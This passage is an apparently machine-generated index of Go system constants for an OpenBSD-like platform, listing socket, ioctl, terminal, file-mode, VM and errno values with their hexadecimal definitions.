RTV_SSTHRESH = 0x20 constant RT_TABLEID_BITS (line 1259) | RT_TABLEID_BITS = 0x8 constant RT_TABLEID_MASK (line 1260) | RT_TABLEID_MASK = 0xff constant RT_TABLEID_MAX (line 1261) | RT_TABLEID_MAX = 0xff constant RUSAGE_CHILDREN (line 1262) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1263) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1264) | RUSAGE_THREAD = 0x1 constant SCM_RIGHTS (line 1265) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1266) | SCM_TIMESTAMP = 0x4 constant SEEK_CUR (line 1267) | SEEK_CUR = 0x1 constant SEEK_END (line 1268) | SEEK_END = 0x2 constant SEEK_SET (line 1269) | SEEK_SET = 0x0 constant SHUT_RD (line 1270) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1271) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1272) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1273) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1274) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1275) | SIOCAIFGROUP = 0x80286987 constant SIOCATMARK (line 1276) | SIOCATMARK = 0x40047307 constant SIOCBRDGADD (line 1277) | SIOCBRDGADD = 0x8060693c constant SIOCBRDGADDL (line 1278) | SIOCBRDGADDL = 0x80606949 constant SIOCBRDGADDS (line 1279) | SIOCBRDGADDS = 0x80606941 constant SIOCBRDGARL (line 1280) | SIOCBRDGARL = 0x808c694d constant SIOCBRDGDADDR (line 1281) | SIOCBRDGDADDR = 0x81286947 constant SIOCBRDGDEL (line 1282) | SIOCBRDGDEL = 0x8060693d constant SIOCBRDGDELS (line 1283) | SIOCBRDGDELS = 0x80606942 constant SIOCBRDGFLUSH (line 1284) | SIOCBRDGFLUSH = 0x80606948 constant SIOCBRDGFRL (line 1285) | SIOCBRDGFRL = 0x808c694e constant SIOCBRDGGCACHE (line 1286) | SIOCBRDGGCACHE = 0xc0146941 constant SIOCBRDGGFD (line 1287) | SIOCBRDGGFD = 0xc0146952 constant SIOCBRDGGHT (line 1288) | SIOCBRDGGHT = 0xc0146951 constant SIOCBRDGGIFFLGS (line 1289) | SIOCBRDGGIFFLGS = 0xc060693e constant SIOCBRDGGMA (line 1290) | SIOCBRDGGMA = 0xc0146953 constant SIOCBRDGGPARAM (line 1291) | SIOCBRDGGPARAM = 0xc0406958 constant SIOCBRDGGPRI (line 1292) | SIOCBRDGGPRI = 0xc0146950 constant SIOCBRDGGRL (line 1293) | SIOCBRDGGRL = 0xc030694f constant SIOCBRDGGTO (line 1294) | SIOCBRDGGTO = 0xc0146946 constant SIOCBRDGIFS (line 1295) | SIOCBRDGIFS = 0xc0606942 constant SIOCBRDGRTS (line 1296) | SIOCBRDGRTS = 0xc0206943 constant SIOCBRDGSADDR (line 1297) | SIOCBRDGSADDR = 0xc1286944 constant SIOCBRDGSCACHE (line 1298) | SIOCBRDGSCACHE = 0x80146940 constant SIOCBRDGSFD (line 1299) | SIOCBRDGSFD = 0x80146952 constant SIOCBRDGSHT (line 1300) | SIOCBRDGSHT = 0x80146951 constant SIOCBRDGSIFCOST (line 1301) | SIOCBRDGSIFCOST = 0x80606955 constant SIOCBRDGSIFFLGS (line 1302) | SIOCBRDGSIFFLGS = 0x8060693f constant SIOCBRDGSIFPRIO (line 1303) | SIOCBRDGSIFPRIO = 0x80606954 constant SIOCBRDGSIFPROT (line 1304) | SIOCBRDGSIFPROT = 0x8060694a constant SIOCBRDGSMA (line 1305) | SIOCBRDGSMA = 0x80146953 constant SIOCBRDGSPRI (line 1306) | SIOCBRDGSPRI = 0x80146950 constant SIOCBRDGSPROTO (line 1307) | SIOCBRDGSPROTO = 0x8014695a constant SIOCBRDGSTO (line 1308) | SIOCBRDGSTO = 0x80146945 constant SIOCBRDGSTXHC (line 1309) | SIOCBRDGSTXHC = 0x80146959 constant SIOCDELLABEL (line 1310) | SIOCDELLABEL = 0x80206997 constant SIOCDELMULTI (line 1311) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1312) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1313) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPARENT (line 1314) | SIOCDIFPARENT = 0x802069b4 constant SIOCDIFPHYADDR (line 1315) | SIOCDIFPHYADDR = 0x80206949 constant SIOCDPWE3NEIGHBOR (line 1316) | SIOCDPWE3NEIGHBOR = 0x802069de constant SIOCDVNETID (line 1317) | SIOCDVNETID = 0x802069af constant SIOCGETKALIVE (line 1318) | SIOCGETKALIVE = 0xc01869a4 constant SIOCGETLABEL (line 1319) | SIOCGETLABEL = 0x8020699a constant SIOCGETMPWCFG (line 1320) | SIOCGETMPWCFG = 0xc02069ae constant SIOCGETPFLOW (line 1321) | SIOCGETPFLOW = 0xc02069fe constant SIOCGETPFSYNC (line 1322) | SIOCGETPFSYNC = 0xc02069f8 constant SIOCGETSGCNT (line 1323) | SIOCGETSGCNT = 0xc0207534 constant SIOCGETVIFCNT (line 1324) | SIOCGETVIFCNT = 0xc0287533 constant SIOCGETVLAN (line 1325) | SIOCGETVLAN = 0xc0206990 constant SIOCGIFADDR (line 1326) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFBRDADDR (line 1327) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCONF (line 1328) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDATA (line 1329) | SIOCGIFDATA = 0xc020691b constant SIOCGIFDESCR (line 1330) | SIOCGIFDESCR = 0xc0206981 constant SIOCGIFDSTADDR (line 1331) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1332) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGATTR (line 1333) | SIOCGIFGATTR = 0xc028698b constant SIOCGIFGENERIC (line 1334) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGLIST (line 1335) | SIOCGIFGLIST = 0xc028698d constant SIOCGIFGMEMB (line 1336) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1337) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFHARDMTU (line 1338) | SIOCGIFHARDMTU = 0xc02069a5 constant SIOCGIFLLPRIO (line 1339) | SIOCGIFLLPRIO = 0xc02069b6 constant SIOCGIFMEDIA (line 1340) | SIOCGIFMEDIA = 0xc0406938 constant SIOCGIFMETRIC (line 1341) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1342) | SIOCGIFMTU = 0xc020697e constant SIOCGIFNETMASK (line 1343) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPAIR (line 1344) | SIOCGIFPAIR = 0xc02069b1 constant SIOCGIFPARENT (line 1345) | SIOCGIFPARENT = 0xc02069b3 constant SIOCGIFPRIORITY (line 1346) | SIOCGIFPRIORITY = 0xc020699c constant SIOCGIFRDOMAIN (line 1347) | SIOCGIFRDOMAIN = 0xc02069a0 constant SIOCGIFRTLABEL (line 1348) | SIOCGIFRTLABEL = 0xc0206983 constant SIOCGIFRXR (line 1349) | SIOCGIFRXR = 0x802069aa constant SIOCGIFSFFPAGE (line 1350) | SIOCGIFSFFPAGE = 0xc1126939 constant SIOCGIFXFLAGS (line 1351) | SIOCGIFXFLAGS = 0xc020699e constant SIOCGLIFPHYADDR (line 1352) | SIOCGLIFPHYADDR = 0xc218694b constant SIOCGLIFPHYDF (line 1353) | SIOCGLIFPHYDF = 0xc02069c2 constant SIOCGLIFPHYECN (line 1354) | SIOCGLIFPHYECN = 0xc02069c8 constant SIOCGLIFPHYRTABLE (line 1355) | SIOCGLIFPHYRTABLE = 0xc02069a2 constant SIOCGLIFPHYTTL (line 1356) | SIOCGLIFPHYTTL = 0xc02069a9 constant SIOCGPGRP (line 1357) | SIOCGPGRP = 0x40047309 constant SIOCGPWE3 (line 1358) | SIOCGPWE3 = 0xc0206998 constant SIOCGPWE3CTRLWORD (line 1359) | SIOCGPWE3CTRLWORD = 0xc02069dc constant SIOCGPWE3FAT (line 1360) | SIOCGPWE3FAT = 0xc02069dd constant SIOCGPWE3NEIGHBOR (line 1361) | SIOCGPWE3NEIGHBOR = 0xc21869de constant SIOCGRXHPRIO (line 1362) | SIOCGRXHPRIO = 0xc02069db constant SIOCGSPPPPARAMS (line 1363) | SIOCGSPPPPARAMS = 0xc0206994 constant SIOCGTXHPRIO (line 1364) | SIOCGTXHPRIO = 0xc02069c6 constant SIOCGUMBINFO (line 1365) | SIOCGUMBINFO = 0xc02069be constant SIOCGUMBPARAM (line 1366) | SIOCGUMBPARAM = 0xc02069c0 constant SIOCGVH (line 1367) | SIOCGVH = 0xc02069f6 constant SIOCGVNETFLOWID (line 1368) | SIOCGVNETFLOWID = 0xc02069c4 constant SIOCGVNETID (line 1369) | SIOCGVNETID = 0xc02069a7 constant SIOCIFAFATTACH (line 1370) | SIOCIFAFATTACH = 0x801169ab constant SIOCIFAFDETACH (line 1371) | SIOCIFAFDETACH = 0x801169ac constant SIOCIFCREATE (line 1372) | SIOCIFCREATE = 0x8020697a constant SIOCIFDESTROY (line 1373) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1374) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSETKALIVE (line 1375) | SIOCSETKALIVE = 0x801869a3 constant SIOCSETLABEL (line 1376) | SIOCSETLABEL = 0x80206999 constant SIOCSETMPWCFG (line 1377) | SIOCSETMPWCFG = 0x802069ad constant SIOCSETPFLOW (line 1378) | SIOCSETPFLOW = 0x802069fd constant SIOCSETPFSYNC (line 1379) | SIOCSETPFSYNC = 0x802069f7 constant SIOCSETVLAN (line 1380) | SIOCSETVLAN = 0x8020698f constant SIOCSIFADDR (line 1381) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1382) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFDESCR (line 1383) | SIOCSIFDESCR = 0x80206980 constant SIOCSIFDSTADDR (line 1384) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1385) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGATTR (line 1386) | SIOCSIFGATTR = 0x8028698c constant SIOCSIFGENERIC (line 1387) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1388) | SIOCSIFLLADDR = 0x8020691f constant SIOCSIFLLPRIO (line 1389) | SIOCSIFLLPRIO = 0x802069b5 constant SIOCSIFMEDIA (line 1390) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1391) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1392) | SIOCSIFMTU = 0x8020697f constant SIOCSIFNETMASK (line 1393) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPAIR (line 1394) | SIOCSIFPAIR = 0x802069b0 constant SIOCSIFPARENT (line 1395) | SIOCSIFPARENT = 0x802069b2 constant SIOCSIFPRIORITY (line 1396) | SIOCSIFPRIORITY = 0x8020699b constant SIOCSIFRDOMAIN (line 1397) | SIOCSIFRDOMAIN = 0x8020699f constant SIOCSIFRTLABEL (line 1398) | SIOCSIFRTLABEL = 0x80206982 constant SIOCSIFXFLAGS (line 1399) | SIOCSIFXFLAGS = 0x8020699d constant SIOCSLIFPHYADDR (line 1400) | SIOCSLIFPHYADDR = 0x8218694a constant SIOCSLIFPHYDF (line 1401) | SIOCSLIFPHYDF = 0x802069c1 constant SIOCSLIFPHYECN (line 1402) | SIOCSLIFPHYECN = 0x802069c7 constant SIOCSLIFPHYRTABLE (line 1403) | SIOCSLIFPHYRTABLE = 0x802069a1 constant SIOCSLIFPHYTTL (line 1404) | SIOCSLIFPHYTTL = 0x802069a8 constant SIOCSPGRP (line 1405) | SIOCSPGRP = 0x80047308 constant SIOCSPWE3CTRLWORD (line 1406) | SIOCSPWE3CTRLWORD = 0x802069dc constant SIOCSPWE3FAT (line 1407) | SIOCSPWE3FAT = 0x802069dd constant SIOCSPWE3NEIGHBOR (line 1408) | SIOCSPWE3NEIGHBOR = 0x821869de constant SIOCSRXHPRIO (line 1409) | SIOCSRXHPRIO = 0x802069db constant SIOCSSPPPPARAMS (line 1410) | SIOCSSPPPPARAMS = 0x80206993 constant SIOCSTXHPRIO (line 1411) | SIOCSTXHPRIO = 0x802069c5 constant SIOCSUMBPARAM (line 1412) | SIOCSUMBPARAM = 0x802069bf constant SIOCSVH (line 1413) | SIOCSVH = 0xc02069f5 constant SIOCSVNETFLOWID (line 1414) | SIOCSVNETFLOWID = 0x802069c3 constant SIOCSVNETID (line 1415) | SIOCSVNETID = 0x802069a6 constant SOCK_CLOEXEC (line 1416) | SOCK_CLOEXEC = 0x8000 constant SOCK_DGRAM (line 1417) | SOCK_DGRAM = 0x2 constant SOCK_DNS (line 1418) | SOCK_DNS = 0x1000 constant SOCK_NONBLOCK (line 1419) | SOCK_NONBLOCK = 0x4000 constant SOCK_RAW (line 1420) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1421) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1422) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1423) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1424) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1425) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1426) | SO_ACCEPTCONN = 0x2 constant SO_BINDANY (line 1427) | SO_BINDANY = 0x1000 constant SO_BROADCAST (line 1428) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1429) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1430) | SO_DOMAIN = 0x1024 constant SO_DONTROUTE (line 1431) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1432) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1433) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1434) | SO_LINGER = 0x80 constant SO_NETPROC (line 1435) | SO_NETPROC = 0x1020 constant SO_OOBINLINE (line 1436) | SO_OOBINLINE = 0x100 constant SO_PEERCRED (line 1437) | SO_PEERCRED = 0x1022 constant SO_PROTOCOL (line 1438) | SO_PROTOCOL = 0x1025 constant SO_RCVBUF (line 1439) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1440) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1441) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1442) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1443) | SO_REUSEPORT = 0x200 constant SO_RTABLE (line 1444) | SO_RTABLE = 0x1021 constant SO_SNDBUF (line 1445) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1446) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1447) | SO_SNDTIMEO = 0x1005 constant SO_SPLICE (line 1448) | SO_SPLICE = 0x1023 constant SO_TIMESTAMP (line 1449) | SO_TIMESTAMP = 0x800 constant SO_TYPE (line 1450) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1451) | SO_USELOOPBACK = 0x40 constant SO_ZEROIZE (line 1452) | SO_ZEROIZE = 0x2000 constant S_BLKSIZE (line 1453) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1454) | S_IEXEC = 0x40 constant S_IFBLK (line 1455) | S_IFBLK = 0x6000 constant S_IFCHR (line 1456) | S_IFCHR = 0x2000 constant S_IFDIR (line 1457) | S_IFDIR = 0x4000 constant S_IFIFO (line 1458) | S_IFIFO = 0x1000 constant S_IFLNK (line 1459) | S_IFLNK = 0xa000 constant S_IFMT (line 1460) | S_IFMT = 0xf000 constant S_IFREG (line 1461) | S_IFREG = 0x8000 constant S_IFSOCK (line 1462) | S_IFSOCK = 0xc000 constant S_IREAD (line 1463) | S_IREAD = 0x100 constant S_IRGRP (line 1464) | S_IRGRP = 0x20 constant S_IROTH (line 1465) | S_IROTH = 0x4 constant S_IRUSR (line 1466) | S_IRUSR = 0x100 constant S_IRWXG (line 1467) | S_IRWXG = 0x38 constant S_IRWXO (line 1468) | S_IRWXO = 0x7 constant S_IRWXU (line 1469) | S_IRWXU = 0x1c0 constant S_ISGID (line 1470) | S_ISGID = 0x400 constant S_ISTXT (line 1471) | S_ISTXT = 0x200 constant S_ISUID (line 1472) | S_ISUID = 0x800 constant S_ISVTX (line 1473) | S_ISVTX = 0x200 constant S_IWGRP (line 1474) | S_IWGRP = 0x10 constant S_IWOTH (line 1475) | S_IWOTH = 0x2 constant S_IWRITE (line 1476) | S_IWRITE = 0x80 constant S_IWUSR (line 1477) | S_IWUSR = 0x80 constant S_IXGRP (line 1478) | S_IXGRP = 0x8 constant S_IXOTH (line 1479) | S_IXOTH = 0x1 constant S_IXUSR (line 1480) | S_IXUSR = 0x40 constant TCIFLUSH (line 1481) | TCIFLUSH = 0x1 constant TCIOFF (line 1482) | TCIOFF = 0x3 constant TCIOFLUSH (line 1483) | TCIOFLUSH = 0x3 constant TCION (line 1484) | TCION = 0x4 constant TCOFLUSH (line 1485) | TCOFLUSH = 0x2 constant TCOOFF (line 1486) | TCOOFF = 0x1 constant TCOON (line 1487) | TCOON = 0x2 constant TCPOPT_EOL (line 1488) | TCPOPT_EOL = 0x0 constant TCPOPT_MAXSEG (line 1489) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1490) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1491) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1492) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1493) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1494) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1495) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1496) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1497) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1498) | TCPOPT_WINDOW = 0x3 constant TCP_INFO (line 1499) | TCP_INFO = 0x9 constant TCP_MAXSEG (line 1500) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1501) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1502) | TCP_MAX_SACK = 0x3 constant TCP_MAX_WINSHIFT (line 1503) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1504) | TCP_MD5SIG = 0x4 constant TCP_MSS (line 1505) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1506) | TCP_NODELAY = 0x1 constant TCP_NOPUSH (line 1507) | TCP_NOPUSH = 0x10 constant TCP_SACKHOLE_LIMIT (line 1508) | TCP_SACKHOLE_LIMIT = 0x80 constant TCP_SACK_ENABLE (line 1509) | TCP_SACK_ENABLE = 0x8 constant TCSAFLUSH (line 1510) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1511) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1512) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1513) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1514) | TIOCCDTR = 0x20007478 constant TIOCCHKVERAUTH (line 1515) | TIOCCHKVERAUTH = 0x2000741e constant TIOCCLRVERAUTH (line 1516) | TIOCCLRVERAUTH = 0x2000741d constant TIOCCONS (line 1517) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1518) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1519) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1520) | TIOCEXT = 0x80047460 constant TIOCFLAG_CLOCAL (line 1521) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1522) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1523) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_PPS (line 1524) | TIOCFLAG_PPS = 0x10 constant TIOCFLAG_SOFTCAR (line 1525) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1526) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1527) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1528) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1529) | TIOCGFLAGS = 0x4004745d constant TIOCGPGRP (line 1530) | TIOCGPGRP = 0x40047477 constant TIOCGSID (line 1531) | TIOCGSID = 0x40047463 constant TIOCGTSTAMP (line 1532) | TIOCGTSTAMP = 0x4010745b constant TIOCGWINSZ (line 1533) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1534) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1535) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1536) | TIOCMGET = 0x4004746a constant TIOCMODG (line 1537) | TIOCMODG = 0x4004746a constant TIOCMODS (line 1538) | TIOCMODS = 0x8004746d constant TIOCMSET (line 1539) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1540) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1541) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1542) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1543) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1544) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1545) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1546) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1547) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1548) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1549) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1550) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1551) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1552) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1553) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1554) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1555) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1556) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1557) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1558) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1559) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1560) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1561) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1562) | TIOCPKT_STOP = 0x4 constant TIOCREMOTE (line 1563) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1564) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1565) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1566) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1567) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1568) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1569) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1570) | TIOCSETD = 0x8004741b constant TIOCSETVERAUTH (line 1571) | TIOCSETVERAUTH = 0x8004741c constant TIOCSFLAGS (line 1572) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1573) | TIOCSIG = 0x8004745f constant TIOCSPGRP (line 1574) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1575) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1576) | TIOCSTAT = 0x20007465 constant TIOCSTOP (line 1577) | TIOCSTOP = 0x2000746f constant TIOCSTSTAMP (line 1578) | TIOCSTSTAMP = 0x8008745a constant TIOCSWINSZ (line 1579) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1580) | TIOCUCNTL = 0x80047466 constant TIOCUCNTL_CBRK (line 1581) | TIOCUCNTL_CBRK = 0x7a constant TIOCUCNTL_SBRK (line 1582) | TIOCUCNTL_SBRK = 0x7b constant TOSTOP (line 1583) | TOSTOP = 0x400000 constant UTIME_NOW (line 1584) | UTIME_NOW = -0x2 constant UTIME_OMIT (line 1585) | UTIME_OMIT = -0x1 constant VDISCARD (line 1586) | VDISCARD = 0xf constant VDSUSP (line 1587) | VDSUSP = 0xb constant VEOF (line 1588) | VEOF = 0x0 constant VEOL (line 1589) | VEOL = 0x1 constant VEOL2 (line 1590) | VEOL2 = 0x2 constant VERASE (line 1591) | VERASE = 0x3 constant VINTR (line 1592) | VINTR = 0x8 constant VKILL (line 1593) | VKILL = 0x5 constant VLNEXT (line 1594) | VLNEXT = 0xe constant VMIN (line 1595) | VMIN = 0x10 constant VM_ANONMIN (line 1596) | VM_ANONMIN = 0x7 constant VM_LOADAVG (line 1597) | VM_LOADAVG = 0x2 constant VM_MALLOC_CONF (line 1598) | VM_MALLOC_CONF = 0xc constant VM_MAXID (line 1599) | VM_MAXID = 0xd constant VM_MAXSLP (line 1600) | VM_MAXSLP = 0xa constant VM_METER (line 1601) | VM_METER = 0x1 constant VM_NKMEMPAGES (line 1602) | VM_NKMEMPAGES = 0x6 constant VM_PSSTRINGS (line 1603) | VM_PSSTRINGS = 0x3 constant VM_SWAPENCRYPT (line 1604) | VM_SWAPENCRYPT = 0x5 constant VM_USPACE (line 1605) | VM_USPACE = 0xb constant VM_UVMEXP (line 1606) | VM_UVMEXP = 0x4 constant VM_VNODEMIN (line 1607) | VM_VNODEMIN = 0x9 constant VM_VTEXTMIN (line 1608) | VM_VTEXTMIN = 0x8 constant VQUIT (line 1609) | VQUIT = 0x9 constant VREPRINT (line 1610) | VREPRINT = 0x6 constant VSTART (line 1611) | VSTART = 0xc constant VSTATUS (line 1612) | VSTATUS = 0x12 constant VSTOP (line 1613) | VSTOP = 0xd constant VSUSP (line 1614) | VSUSP = 0xa constant VTIME (line 1615) | VTIME = 0x11 constant VWERASE (line 1616) | VWERASE = 0x4 constant WALTSIG (line 1617) | WALTSIG = 0x4 constant WCONTINUED (line 1618) | WCONTINUED = 0x8 constant WCOREFLAG (line 1619) | WCOREFLAG = 0x80 constant WNOHANG (line 1620) | WNOHANG = 0x1 constant WUNTRACED (line 1621) | WUNTRACED = 0x2 constant XCASE (line 1622) | XCASE = 0x1000000 constant E2BIG (line 1627) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1628) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1629) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1630) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1631) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1632) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1633) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1634) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1635) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1636) | EBADMSG = syscall.Errno(0x5c) constant EBADRPC (line 1637) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1638) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1639) | ECANCELED = syscall.Errno(0x58) constant ECHILD (line 1640) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1641) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1642) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1643) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1644) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1645) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1646) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1647) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1648) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1649) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1650) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1651) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1652) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1653) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1654) | EIDRM = syscall.Errno(0x59) constant EILSEQ (line 1655) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 1656) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1657) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1658) | EINVAL = syscall.Errno(0x16) constant EIO (line 1659) | EIO = syscall.Errno(0x5) constant EIPSEC (line 1660) | EIPSEC = syscall.Errno(0x52) constant EISCONN (line 1661) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1662) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1663) | ELAST = syscall.Errno(0x5f) constant ELOOP (line 1664) | ELOOP = syscall.Errno(0x3e) constant EMEDIUMTYPE (line 1665) | EMEDIUMTYPE = syscall.Errno(0x56) constant EMFILE (line 1666) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1667) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1668) | EMSGSIZE = syscall.Errno(0x28) constant ENAMETOOLONG (line 1669) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1670) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1671) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1672) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1673) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1674) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1675) | 